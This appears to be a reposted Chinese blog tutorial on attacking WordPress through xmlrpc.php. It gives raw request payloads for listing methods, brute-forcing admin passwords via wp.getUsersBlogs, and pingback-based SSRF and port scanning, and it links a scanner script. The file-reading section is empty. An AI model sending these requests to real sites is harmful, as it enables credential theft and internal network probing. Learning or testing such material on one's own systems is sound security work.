当前位置:   article > 正文

WordPress xmlrpc.php 漏洞利用_wordpress xmlrpc漏洞

wordpress xmlrpc漏洞

WordPress采用了XML-RPC接口.并且通过内置函数WordPress API实现了该接口内容。 所以,你可要通过客户端来管理Wordpress。 通过使用WordPress XML-RPC, 你可以使用业界流行博客客户端Weblog Clients来发布你的WordPress日志和页面。同时,XML-RPC 也可使用extended by WordPress Plugins插件来自定义你的规则。



0X01 激活XML-RPC
作者:wh1te8ea
链接:https://www.jianshu.com/p/42e3b065ad76
来源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

从3.5版本开始,XML-RPC功能默认开启。 早些版本,可通过如下方法激活:Settings > Writing > Remote Publishing and check the checkbox.

路径:http://example.com/wordpress/xmlrpc.php

0x02 查看系统允许的方法

 

  1. POST /wordpress/xmlrpc.php HTTP/1.1
  2. Host: www.example.com
  3. Content-Length: 99
  4. <methodCall>
  5. <methodName>system.listMethods</methodName>
  6. <params></params>
  7. </methodCall>

 

0x03 账号爆破

一般情况下,wordpress的管理后台都会设置账号登录失败次数限制,因此,可以通过xmlprc.php接口来进行爆破。通常会使用wp.getUserBlogs、wp.getCategories和metaWeblog.getUsersBlogs这个方法来进行爆破,也可以使用其他的方法。
构造请求包:

  1. POST /wordpress/xmlrpc.php HTTP/1.1
  2. Host: www.example.com
  3. Content-Length: 99
  4. <methodCall>
  5. <methodName>wp.getUsersBlogs</methodName>
  6. <params>
  7. <param><value>admin</value></param>
  8. <param><value>password</value></param>
  9. </params>
  10. </methodCall>

爆破成功会返回博客的内容:

 

 

0x03 SSRF

WordPress 版本< 3.5.1
通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描。
构造请求包:

  1. POST /wordpress/xmlrpc.php HTTP/1.1
  2. Host: www.example.com
  3. Content-Length: 99
  4. <methodCall>
  5. <methodName>pingback.ping</methodName>
  6. <params><param>
  7. <value><string>要探测的ip和端口:http://127.0.0.1:80</string></value>
  8. </param><param><value><string>网站上一篇博客的URL:http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string>
  9. </value></param></params>
  10. </methodCall>

IP和端口存在,返回包中的<value><int>中的值大于0: 

利用脚本:
https://github.com/FireFart/WordpressPingbackPortScanner

0x04 读取文件:

 

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/天景科技苑/article/detail/734733
推荐阅读
相关标签
  

闽ICP备14008679号